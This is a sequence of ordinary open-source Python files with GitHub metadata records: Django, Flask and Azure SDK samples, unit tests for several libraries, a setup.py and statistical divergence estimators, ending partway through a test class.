https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
]
| {
"content_hash": "608e603e8d34c3af8a8c721938ee6bd2",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 79,
"avg_line_length": 36.19047619047619,
"alnum_prop": 0.6986842105263158,
"repo_name": "13lcp2000/CF_django_1-9-6",
"id": "a76b01124dc6d2a39a95e068d432048ad21834de",
"size": "760",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Test/Test/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "4613"
}
],
"symlink_target": ""
} |
from datetime import time, timedelta
import unittest
from convertish.util import SimpleTZInfo
class TestSimpleTZInfo(unittest.TestCase):
def test_utcoffset(self):
self.assertEquals(SimpleTZInfo(60).utcoffset(None), timedelta(minutes=60))
self.assertEquals(SimpleTZInfo(-60).utcoffset(None), timedelta(minutes=-60))
def test_dst(self):
tz = SimpleTZInfo(60)
self.assertEquals(tz.dst(None), timedelta())
def test_tzname(self):
self.assertEquals(SimpleTZInfo(0).tzname(None), "+00:00")
self.assertEquals(SimpleTZInfo(60).tzname(None), "+01:00")
self.assertEquals(SimpleTZInfo(90).tzname(None), "+01:30")
self.assertEquals(SimpleTZInfo(-60).tzname(None), "-01:00")
self.assertEquals(SimpleTZInfo(-90).tzname(None), "-01:30")
def test_affect(self):
self.assertEquals(time(1, 2, 3, 0, SimpleTZInfo(0)).isoformat(), '01:02:03+00:00')
self.assertEquals(time(1, 2, 3, 0, SimpleTZInfo(90)).isoformat(), '01:02:03+01:30')
self.assertEquals(time(1, 2, 3, 0, SimpleTZInfo(-90)).isoformat(), '01:02:03-01:30')
| {
"content_hash": "fd4cbf66b66914222a0de309706d7df2",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 92,
"avg_line_length": 39.857142857142854,
"alnum_prop": 0.6693548387096774,
"repo_name": "ish/convertish",
"id": "a6bc774e01b09f0b7fb3a63086d7fe8f2c00b399",
"size": "1116",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "convertish/tests/test_util.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "617020"
},
{
"name": "Python",
"bytes": "40340"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, print_function, division
import unittest
from pony.orm.core import *
db = Database('sqlite', ':memory:')
class Person(db.Entity):
name = Required(unicode)
age = Required(int)
db.generate_mapping(create_tables=True)
with db_session:
p1 = Person(name='John', age=22)
p2 = Person(name='Mary', age=18)
p3 = Person(name='Mike', age=25)
class TestFrames(unittest.TestCase):
@db_session
def test_select(self):
x = 20
result = select(p.id for p in Person if p.age > x)[:]
self.assertEqual(set(result), {1, 3})
@db_session
def test_select_str(self):
x = 20
result = select('p.id for p in Person if p.age > x')[:]
self.assertEqual(set(result), {1, 3})
@db_session
def test_left_join(self):
x = 20
result = left_join(p.id for p in Person if p.age > x)[:]
self.assertEqual(set(result), {1, 3})
@db_session
def test_left_join_str(self):
x = 20
result = left_join('p.id for p in Person if p.age > x')[:]
self.assertEqual(set(result), {1, 3})
@db_session
def test_get(self):
x = 23
result = get(p.id for p in Person if p.age > x)
self.assertEqual(result, 3)
@db_session
def test_get_str(self):
x = 23
result = get('p.id for p in Person if p.age > x')
self.assertEqual(result, 3)
@db_session
def test_exists(self):
x = 23
result = exists(p for p in Person if p.age > x)
self.assertEqual(result, True)
@db_session
def test_exists_str(self):
x = 23
result = exists('p for p in Person if p.age > x')
self.assertEqual(result, True)
@db_session
def test_entity_get(self):
x = 23
p = Person.get(lambda p: p.age > x)
self.assertEqual(p, Person[3])
@db_session
def test_entity_get_str(self):
x = 23
p = Person.get('lambda p: p.age > x')
self.assertEqual(p, Person[3])
@db_session
def test_entity_get_by_sql(self):
x = 25
p = Person.get_by_sql('select * from Person where age = $x')
self.assertEqual(p, Person[3])
@db_session
def test_entity_select_by_sql(self):
x = 25
p = Person.select_by_sql('select * from Person where age = $x')
self.assertEqual(p, [ Person[3] ])
@db_session
def test_entity_exists(self):
x = 23
result = Person.exists(lambda p: p.age > x)
self.assertTrue(result)
@db_session
def test_entity_exists_str(self):
x = 23
result = Person.exists('lambda p: p.age > x')
self.assertTrue(result)
@db_session
def test_entity_select(self):
x = 20
result = Person.select(lambda p: p.age > x)[:]
self.assertEqual(set(result), {Person[1], Person[3]})
@db_session
def test_entity_select_str(self):
x = 20
result = Person.select('lambda p: p.age > x')[:]
self.assertEqual(set(result), {Person[1], Person[3]})
@db_session
def test_order_by(self):
x = 20
y = -1
result = Person.select(lambda p: p.age > x).order_by(lambda p: p.age * y)[:]
self.assertEqual(result, [Person[3], Person[1]])
@db_session
def test_order_by_str(self):
x = 20
y = -1
result = Person.select('lambda p: p.age > x').order_by('p.age * y')[:]
self.assertEqual(result, [Person[3], Person[1]])
@db_session
def test_filter(self):
x = 20
y = 'M'
result = Person.select(lambda p: p.age > x).filter(lambda p: p.name.startswith(y))[:]
self.assertEqual(result, [Person[3]])
@db_session
def test_filter_str(self):
x = 20
y = 'M'
result = Person.select('lambda p: p.age > x').filter('p.name.startswith(y)')[:]
self.assertEqual(result, [Person[3]])
@db_session
def test_db_select(self):
x = 20
result = db.select('name from Person where age > $x order by name')
self.assertEqual(result, ['John', 'Mike'])
@db_session
def test_db_get(self):
x = 18
result = db.get('name from Person where age = $x')
self.assertEqual(result, 'Mary')
@db_session
def test_db_execute(self):
x = 18
result = db.execute('select name from Person where age = $x').fetchone()
self.assertEqual(result, ('Mary',))
@db_session
def test_db_exists(self):
x = 18
result = db.exists('name from Person where age = $x')
self.assertEqual(result, True)
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "2dd4bc941ba74380a0797d8236b38dce",
"timestamp": "",
"source": "github",
"line_count": 171,
"max_line_length": 93,
"avg_line_length": 28.450292397660817,
"alnum_prop": 0.5405960945529291,
"repo_name": "Ahmad31/Web_Flask_Cassandra",
"id": "7d9dd5df7624d617d1172bde5288a10f47be60cf",
"size": "4865",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "flask/lib/python2.7/site-packages/pony/orm/tests/test_frames.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "34860"
},
{
"name": "CSS",
"bytes": "6270"
},
{
"name": "HTML",
"bytes": "86875"
},
{
"name": "JavaScript",
"bytes": "7232"
},
{
"name": "Jupyter Notebook",
"bytes": "181"
},
{
"name": "Python",
"bytes": "12265503"
},
{
"name": "Shell",
"bytes": "3248"
}
],
"symlink_target": ""
} |
import urllib.parse
import flask
from dila import config
from dila.frontend.flask import languages
from dila.frontend.flask import user_tools
def setup_app(app):
@app.template_global()
def static_url(filename):
if config.STATIC_URL:
return urllib.parse.urljoin(config.STATIC_URL, filename)
return flask.url_for('static', filename=filename)
def setup_language_context(blueprint):
@blueprint.context_processor
def inject_languages_menu():
return {
'languages_form': languages.get_new_form(),
'languages_links': list(languages.get_language_links()),
'current_language_code': languages.current_language_code(),
'current_language': languages.current_language(),
}
def setup_user_context(blueprint):
@blueprint.context_processor
def inject_curren_user_menu():
return {
'current_user': user_tools.current_user(),
}
| {
"content_hash": "b0671fa470477566c3bb3c2cba5077fc",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 71,
"avg_line_length": 28.235294117647058,
"alnum_prop": 0.659375,
"repo_name": "socialwifi/dila",
"id": "2c3847fc74c6fa8f2b7d0d307ae1badc02d34591",
"size": "960",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "dila/frontend/flask/template_tools.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "11934"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "116973"
},
{
"name": "Shell",
"bytes": "1491"
}
],
"symlink_target": ""
} |
from setuptools import setup, find_packages
from os import path
import re
# Get current path
here = path.abspath(path.dirname(__file__))
# Get version from strikepackage.py
with open(path.join(here, 'strikepackage/strikepackage.py')) as f:
version_file = f.read()
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]",
version_file, re.M)
if version_match:
version = version_match.group(1)
else:
raise RuntimeError("Unable to find version string.")
# Get long description from README and HISTORY
with open(path.join(here, 'README.rst')) as f:
readme = f.read()
with open(path.join(here, 'HISTORY.rst')) as f:
history = f.read()
# Dependencies
requires = [
'Jinja2',
'docopt',
'kaptan',
'requests',
'progress',
'python-simple-hipchat',
'schema',
'XenAPI',
'PyYAML',
]
# Setup
setup(
name='strikepackage',
version=version,
description='A command line tool to deploy virtual machines on XenServer.',
long_description=readme + '\n\n' + history,
author='Paul Liu',
author_email='[email protected]',
url='https://github.com/pwyliu/strikepackage',
license='MIT',
zip_safe=False, # fuck an egg
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: System Administrators',
'Topic :: System :: Systems Administration',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 2 :: Only',
'Operating System :: POSIX :: Linux',
],
keywords='XenServer XenAPI virtualization automation',
install_requires=requires,
include_package_data=True,
packages=find_packages(),
package_data={'examples': ['*.yaml', '*.jinja2']},
entry_points={
'console_scripts': ['strikepackage = strikepackage.strikepackage:main']
},
)
| {
"content_hash": "c48a3b44f0a336178c8563d2d5dc5def",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 79,
"avg_line_length": 29.46153846153846,
"alnum_prop": 0.6318537859007833,
"repo_name": "pwyliu/strikepackage",
"id": "f236c92fe62c811692fe807e58a9db0d5a216b8f",
"size": "1915",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "32867"
}
],
"symlink_target": ""
} |
from textwrap import dedent
from pants.testutil.pants_run_integration_test import PantsRunIntegrationTest
class DependeesIntegrationTest(PantsRunIntegrationTest):
TARGET = "examples/src/scala/org/pantsbuild/example/hello/welcome"
def run_dependees(self, *dependees_options):
args = ["-q", "dependees", self.TARGET]
args.extend(dependees_options)
pants_run = self.run_pants(args)
self.assert_success(pants_run)
return pants_run.stdout_data.strip()
def test_dependees_basic(self):
pants_stdout = self.run_dependees()
expected = {
"examples/src/scala/org/pantsbuild/example/jvm_run:jvm-run-example-lib",
"examples/src/scala/org/pantsbuild/example/hello/exe:exe",
"examples/tests/scala/org/pantsbuild/example/hello/welcome:welcome",
}
actual = set(pants_stdout.split())
self.assertEqual(expected, actual)
def test_dependees_transitive(self):
pants_stdout = self.run_dependees("--dependees-transitive")
self.assertEqual(
{
"examples/src/scala/org/pantsbuild/example/jvm_run:jvm-run-example-lib",
"examples/src/scala/org/pantsbuild/example/hello:hello",
"examples/src/scala/org/pantsbuild/example/jvm_run:jvm-run-example",
"examples/src/scala/org/pantsbuild/example/hello/exe:exe",
"examples/tests/scala/org/pantsbuild/example/hello/welcome:welcome",
},
set(pants_stdout.split()),
)
def test_dependees_closed(self):
pants_stdout = self.run_dependees("--dependees-closed")
self.assertEqual(
{
"examples/src/scala/org/pantsbuild/example/hello/welcome:welcome",
"examples/src/scala/org/pantsbuild/example/jvm_run:jvm-run-example-lib",
"examples/src/scala/org/pantsbuild/example/hello/exe:exe",
"examples/tests/scala/org/pantsbuild/example/hello/welcome:welcome",
},
set(pants_stdout.split()),
)
def test_dependees_json(self):
pants_stdout = self.run_dependees("--dependees-output-format=json")
self.assertEqual(
dedent(
"""
{
"examples/src/scala/org/pantsbuild/example/hello/welcome:welcome": [
"examples/src/scala/org/pantsbuild/example/hello/exe:exe",
"examples/src/scala/org/pantsbuild/example/jvm_run:jvm-run-example-lib",
"examples/tests/scala/org/pantsbuild/example/hello/welcome:welcome"
]
}"""
).lstrip("\n"),
pants_stdout,
)
| {
"content_hash": "3f95930ffa287939361cbe3e7e85f5ae",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 96,
"avg_line_length": 41.17910447761194,
"alnum_prop": 0.602392171076477,
"repo_name": "wisechengyi/pants",
"id": "fef4ff1fbc2da9ddb86a56e3afedba28e1b53627",
"size": "2891",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/python/pants_test/engine/legacy/test_dependees_integration.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "655"
},
{
"name": "C++",
"bytes": "2010"
},
{
"name": "CSS",
"bytes": "9444"
},
{
"name": "Dockerfile",
"bytes": "6634"
},
{
"name": "GAP",
"bytes": "1283"
},
{
"name": "Gherkin",
"bytes": "919"
},
{
"name": "Go",
"bytes": "2765"
},
{
"name": "HTML",
"bytes": "44381"
},
{
"name": "Java",
"bytes": "507948"
},
{
"name": "JavaScript",
"bytes": "22906"
},
{
"name": "Python",
"bytes": "7608990"
},
{
"name": "Rust",
"bytes": "1005243"
},
{
"name": "Scala",
"bytes": "106520"
},
{
"name": "Shell",
"bytes": "105217"
},
{
"name": "Starlark",
"bytes": "489739"
},
{
"name": "Thrift",
"bytes": "2953"
}
],
"symlink_target": ""
} |
__version__ = "0.9.10.3"
# cfgrib core API depends on the ECMWF ecCodes C-library only
from .abc import Field, Fieldset, Index, MappingFieldset
from .cfmessage import COMPUTED_KEYS
from .dataset import (
Dataset,
DatasetBuildError,
compute_index_keys,
open_fieldset,
open_file,
open_from_index,
)
from .messages import FieldsetIndex, FileStream, Message
# NOTE: xarray is not a hard dependency, but let's provide helpers if it is available.
try:
from .xarray_store import open_dataset, open_datasets
except ImportError:
pass
| {
"content_hash": "8fd8da2998bb3c444ff8bd1e1875c675",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 86,
"avg_line_length": 27.95,
"alnum_prop": 0.7334525939177102,
"repo_name": "ecmwf/cfgrib",
"id": "cc71588d47d37b274b46b61f208373502fdf6318",
"size": "1188",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cfgrib/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "2358"
},
{
"name": "Makefile",
"bytes": "820"
},
{
"name": "PowerShell",
"bytes": "3150"
},
{
"name": "Python",
"bytes": "163895"
}
],
"symlink_target": ""
} |
from azure.identity import DefaultAzureCredential
from azure.mgmt.redisenterprise import RedisEnterpriseManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-redisenterprise
# USAGE
python redis_enterprise_databases_import.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = RedisEnterpriseManagementClient(
credential=DefaultAzureCredential(),
subscription_id="subid",
)
response = client.databases.begin_import_method(
resource_group_name="rg1",
cluster_name="cache1",
database_name="default",
parameters={
"sasUris": [
"https://contosostorage.blob.core.window.net/urltoBlobFile1?sasKeyParameters",
"https://contosostorage.blob.core.window.net/urltoBlobFile2?sasKeyParameters",
]
},
).result()
print(response)
# x-ms-original-file: specification/redisenterprise/resource-manager/Microsoft.Cache/stable/2022-01-01/examples/RedisEnterpriseDatabasesImport.json
if __name__ == "__main__":
main()
| {
"content_hash": "3c544392f78b619cb158f244408e9366",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 147,
"avg_line_length": 35.475,
"alnum_prop": 0.7061310782241015,
"repo_name": "Azure/azure-sdk-for-python",
"id": "a1111a5b6ce665b4f97ff16dbbaea5212ee84830",
"size": "1887",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/redisenterprise/azure-mgmt-redisenterprise/generated_samples/redis_enterprise_databases_import.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
from __future__ import division
import numpy as np
from .utils import lazy_range, izip, iteritems
from .mp_utils import progress
def _linear(Bs, dim, num_q, rhos, nus):
# and the rest of the estimator is
# B / m * mean(nu ^ -dim)
return Bs / num_q * np.mean(nus ** (-dim), axis=0)
def kl(Ks, dim, num_q, rhos, nus):
r'''
Estimate the KL divergence between distributions:
\int p(x) \log (p(x) / q(x))
using the kNN-based estimator (5) of
Qing Wang, Sanjeev R Kulkarni, and Sergio Verdu (2009).
Divergence Estimation for Multidimensional Densities Via
k-Nearest-Neighbor Distances.
IEEE Transactions on Information Theory.
http://www.ee.princeton.edu/~verdu/reprints/WanKulVer.May2009.pdf
which is:
d * 1/n \sum \log (nu_k(i) / rho_k(i)) + log(m / (n - 1))
Enforces KL >= 0.
Returns an array of shape (num_Ks,).
'''
est = dim * np.mean(np.log(nus) - np.log(rhos), axis=0)
est += np.log(num_q / (rhos.shape[0] - 1))
np.maximum(est, 0, out=est)
return est
kl.self_value = 0
kl.needs_alpha = False
def _alpha_div(omas, Bs, dim, num_q, rhos, nus):
N = rhos.shape[0]
# the actual main estimate:
# rho^(- dim * est alpha) nu^(- dim * est beta)
# = (rho / nu) ^ (dim * (1 - alpha))
# do some reshaping trickery to get broadcasting right
estimates = (rhos / nus)[:, np.newaxis, :]
estimates = estimates ** (dim * omas.reshape(1, -1, 1))
estimates = np.mean(estimates, axis=0) # shape (n_alphas, n_Ks)
estimates *= Bs
# factors based on the sizes:
# 1 / [ (n-1)^(est alpha) * m^(est beta) ] = ((n-1) / m) ^ (1 - alpha)
estimates *= ((N - 1) / num_q) ** omas
np.maximum(estimates, 0, out=estimates)
return estimates
def _jensen_shannon_core(Ks, dim, min_i, digamma_vals, num_q, rhos, nus):
# We need to calculate the mean over points in X of
# d * log radius of largest ball with no more than M/(n+m-1) weight
# where X points have weight 1 / (2 (n-1))
# and Y points have weight 1 / (2 m)
# - digamma(# of neighbors in that ball)
# NOTE: this is a stupidly slow implementation. the cython one should
# be much better, and also parallelize.
num_p = rhos.shape[0]
t = 2 * num_p - 1
p_wt = 1 / t
q_wt = num_p / (num_q * t)
alphas = Ks / (num_p + num_q - 1)
est = np.zeros(Ks.size)
max_k = rhos.shape[1]
combo = np.empty(max_k * 2, dtype=[('dist', np.float32), ('weight', float)])
# could vectorize this loop if searchsorted worked axis-wise
for rho, nu, in izip(rhos, nus):
combo['dist'][:max_k] = rho
combo['dist'][max_k:] = nu
combo['weight'][:max_k] = p_wt
combo['weight'][max_k:] = q_wt
combo.sort()
quantiles = np.cumsum(combo['weight'])
i = quantiles.searchsorted(alphas, side='right') # number pts in ball
assert i.min() >= min_i
est += dim * np.log(combo['dist'][i - 1]) - digamma_vals[i - min_i]
est /= num_p
return est
################################################################################
def _estimate_cross_divs(features, indices, rhos,
mask, funcs, Ks, max_K, save_all_Ks,
specs, n_meta_only,
progressbar, cores, min_dist):
n_bags = len(features)
K_indices = Ks - 1
which_Ks = slice(None, None) if save_all_Ks else K_indices
outputs = np.empty((n_bags, n_bags, len(specs) + n_meta_only, len(Ks)),
dtype=np.float32)
outputs.fill(np.nan)
# TODO: should just call functions that need self up here with rhos
# instead of computing nus and then throwing them out below
any_run_self = False
all_bags = lazy_range(n_bags)
for func, info in iteritems(funcs):
self_val = getattr(func, 'self_value', None)
if self_val is not None:
pos = np.reshape(info.pos, (-1, 1))
outputs[all_bags, all_bags, pos, :] = self_val
else:
any_run_self = True
# Keep track of whether each function needs rho_sub or just rho
# TODO: this could be faster....
if save_all_Ks:
_needs_sub = {}
def needs_sub(func):
r = _needs_sub.get(func, None)
if r is None:
_needs_sub[func] = r = not getattr(func, 'needs_all_ks', False)
return r
else:
def needs_sub(func):
return False
indices_loop = progress()(indices) if progressbar else indices
for i, index in enumerate(indices_loop):
# Loop over rows of the output array.
#
# We want to search from most(?) of the other bags to this one, as
# determined by mask and to avoid repeating nus.
#
# But we don't want to waste memory copying almost all of the features.
#
# So instead we'll run a separate NN search for each contiguous
# subarray of the features. If they're too small, of course, this hurts
# the parallelizability.
#
# TODO: is there a better scheme than this? use a custom version of
# nanoflann or something?
#
# TODO: Is cythonning this file/this function worth it?
num_q = features._n_pts[i]
# make a boolean array of whether we want to do the ith bag
do_bag = mask[i]
if not any_run_self:
do_bag = do_bag.copy()
do_bag[i] = False
# loop over contiguous sections where do_bag is True
change_pts = np.hstack([0, np.diff(do_bag).nonzero()[0] + 1, n_bags])
s = 0 if do_bag[0] else 1
for start, end in izip(change_pts[s::2], change_pts[s+1::2]):
boundaries = features._boundaries[start:end+1]
feats = features._features[boundaries[0]:boundaries[-1]]
base = boundaries[0]
# find the nearest neighbors in features[i] from each of these bags
neighbors = np.maximum(min_dist,
np.sqrt(index.nn_index(feats, max_K)[1][:, which_Ks]))
for j_sub, j in enumerate(lazy_range(start, end)):
rho = rhos[j]
nu_start = boundaries[j_sub] - base
nu_end = boundaries[j_sub + 1] - base
nu = neighbors[nu_start:nu_end]
if save_all_Ks:
rho_sub = rho[:, K_indices]
nu_sub = nu[:, K_indices]
if i == j:
for func, info in iteritems(funcs):
o = (j, i, info.pos, slice(None))
if getattr(func, 'self_value', None) is None:
# otherwise, already set it above
if needs_sub(func):
outputs[o] = func(num_q, rho_sub, rho_sub)
else:
outputs[o] = func(num_q, rho, rho)
else:
for func, info in iteritems(funcs):
o = (j, i, info.pos, slice(None))
if needs_sub(func):
outputs[o] = func(num_q, rho_sub, nu_sub)
else:
outputs[o] = func(num_q, rho, nu)
return outputs
| {
"content_hash": "952b0ef9b638ef3491d0913633cb0382",
"timestamp": "",
"source": "github",
"line_count": 203,
"max_line_length": 80,
"avg_line_length": 36.38423645320197,
"alnum_prop": 0.5335770376387761,
"repo_name": "dougalsutherland/py-sdm",
"id": "1136a51fe256d1fd15d8a8ba5976bbdd8d4a234c",
"size": "7386",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sdm/_np_divs.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "265012"
}
],
"symlink_target": ""
} |
from flask_failsafe import failsafe
@failsafe
def create_app():
from app import app
return app
if __name__ == '__main__':
create_app().run()
| {
"content_hash": "a11610ebd7b72a7abca3a972039c2e50",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 35,
"avg_line_length": 14.272727272727273,
"alnum_prop": 0.6242038216560509,
"repo_name": "Snuggert/moda",
"id": "00d873a76f7b21b51456043d29f009bbc0c4ebc1",
"size": "157",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "project/run.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "26609"
},
{
"name": "TeX",
"bytes": "4975"
}
],
"symlink_target": ""
} |
"""
Tests for the `v2ex last` function
"""
from __future__ import absolute_import
import re
import pytest
from v2ex_daily_mission.cli import cli
@pytest.mark.usefixtures('mock_api')
class TestLast():
def test_last(self, runner):
result = runner.invoke(cli, ['--config', './tests/v2ex_config.json',
'last'])
day = int(re.search(r'\d+', result.output).group())
assert result.exit_code == 0
assert day == 334
| {
"content_hash": "14ce657bb71de914970bee06474fedfb",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 76,
"avg_line_length": 23.285714285714285,
"alnum_prop": 0.5869120654396728,
"repo_name": "lord63/v2ex_daily_mission",
"id": "2c2fa5dda9208cbbd306c60ebb79ac2a134be9ea",
"size": "536",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_last.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "8323"
},
{
"name": "Makefile",
"bytes": "172"
},
{
"name": "Python",
"bytes": "11421"
}
],
"symlink_target": ""
} |
from test_framework.test_framework import KoreTestFramework
from test_framework.util import *
class ZapWalletTXesTest (KoreTestFramework):
def setup_chain(self):
print("Initializing test directory "+self.options.tmpdir)
initialize_chain_clean(self.options.tmpdir, 3)
def setup_network(self, split=False):
self.nodes = start_nodes(3, self.options.tmpdir)
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
self.is_network_split=False
self.sync_all()
def run_test (self):
print("Mining blocks...")
self.nodes[0].generate(1)
self.sync_all()
self.nodes[1].generate(101)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), 50)
txid0 = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 11)
txid1 = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 10)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
txid2 = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 11)
txid3 = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 10)
tx0 = self.nodes[0].gettransaction(txid0)
assert_equal(tx0['txid'], txid0) #tx0 must be available (confirmed)
tx1 = self.nodes[0].gettransaction(txid1)
assert_equal(tx1['txid'], txid1) #tx1 must be available (confirmed)
tx2 = self.nodes[0].gettransaction(txid2)
assert_equal(tx2['txid'], txid2) #tx2 must be available (unconfirmed)
tx3 = self.nodes[0].gettransaction(txid3)
assert_equal(tx3['txid'], txid3) #tx3 must be available (unconfirmed)
#restart kored
self.nodes[0].stop()
kored_processes[0].wait()
self.nodes[0] = start_node(0,self.options.tmpdir)
tx3 = self.nodes[0].gettransaction(txid3)
assert_equal(tx3['txid'], txid3) #tx must be available (unconfirmed)
self.nodes[0].stop()
kored_processes[0].wait()
#restart kored with zapwallettxes
self.nodes[0] = start_node(0,self.options.tmpdir, ["-zapwallettxes=1"])
assert_raises(JSONRPCException, self.nodes[0].gettransaction, [txid3])
#there must be a expection because the unconfirmed wallettx0 must be gone by now
tx0 = self.nodes[0].gettransaction(txid0)
assert_equal(tx0['txid'], txid0) #tx0 (confirmed) must still be available because it was confirmed
if __name__ == '__main__':
ZapWalletTXesTest ().main ()
| {
"content_hash": "d17e55296586a6e25570936143d9b446",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 106,
"avg_line_length": 37.49295774647887,
"alnum_prop": 0.6187077385424493,
"repo_name": "Kore-Core/kore",
"id": "eae2229cbd04a2ad76c00e74933edd5029392847",
"size": "2874",
"binary": false,
"copies": "1",
"ref": "refs/heads/momentum",
"path": "qa/rpc-tests/zapwallettxes.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "5751739"
},
{
"name": "C++",
"bytes": "5106026"
},
{
"name": "CSS",
"bytes": "43192"
},
{
"name": "HTML",
"bytes": "50621"
},
{
"name": "Java",
"bytes": "2097"
},
{
"name": "M4",
"bytes": "146760"
},
{
"name": "Makefile",
"bytes": "99440"
},
{
"name": "Objective-C",
"bytes": "4343"
},
{
"name": "Objective-C++",
"bytes": "7226"
},
{
"name": "Python",
"bytes": "680485"
},
{
"name": "QMake",
"bytes": "2017"
},
{
"name": "Roff",
"bytes": "3687"
},
{
"name": "Shell",
"bytes": "35590"
}
],
"symlink_target": ""
} |
import unittest
from pymal import account
from pymal.account_objects import account_mangas
from pymal.account_objects import account_animes
from pymal.account_objects import account_friends
from tests.constants_for_testing import ACCOUNT_TEST_USERNAME, ACCOUNT_TEST_PASSWORD
class InitTestCase(unittest.TestCase):
def test_init_not_auth(self):
accnt = account.Account(ACCOUNT_TEST_USERNAME)
self.assertFalse(accnt.is_auth)
account.Account._unregiter(accnt)
def test_account_init_auth(self):
accnt = account.Account(ACCOUNT_TEST_USERNAME, ACCOUNT_TEST_PASSWORD)
self.assertTrue(accnt.is_auth)
account.Account._unregiter(accnt)
def test_init_auth_bad_password(self):
accnt = account.Account(ACCOUNT_TEST_USERNAME, ACCOUNT_TEST_PASSWORD * 2)
self.assertFalse(accnt.is_auth)
account.Account._unregiter(accnt)
def test_init_later_auth(self):
accnt = account.Account(ACCOUNT_TEST_USERNAME)
self.assertFalse(accnt.is_auth)
accnt.change_password(ACCOUNT_TEST_PASSWORD)
self.assertTrue(accnt.is_auth)
account.Account._unregiter(accnt)
def test_init_later_auth_bad_password(self):
accnt = account.Account(ACCOUNT_TEST_USERNAME)
self.assertFalse(accnt.is_auth)
self.assertFalse(accnt.change_password(ACCOUNT_TEST_PASSWORD * 2))
self.assertFalse(accnt.is_auth)
account.Account._unregiter(accnt)
def test_str_no_password(self):
accnt = account.Account(ACCOUNT_TEST_USERNAME)
self.assertEqual(str(accnt), "<Account username: pymal-developr>")
account.Account._unregiter(accnt)
def test_str_with_password(self):
accnt = account.Account(ACCOUNT_TEST_USERNAME, ACCOUNT_TEST_PASSWORD)
self.assertEqual(str(accnt), "<Account username: pymal-developr>")
account.Account._unregiter(accnt)
def test_user_id(self):
accnt = account.Account(ACCOUNT_TEST_USERNAME)
self.assertEqual(accnt.user_id, 3854655)
account.Account._unregiter(accnt)
class FunctionsTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.account = account.Account(ACCOUNT_TEST_USERNAME, ACCOUNT_TEST_PASSWORD)
@classmethod
def tearDownClass(cls):
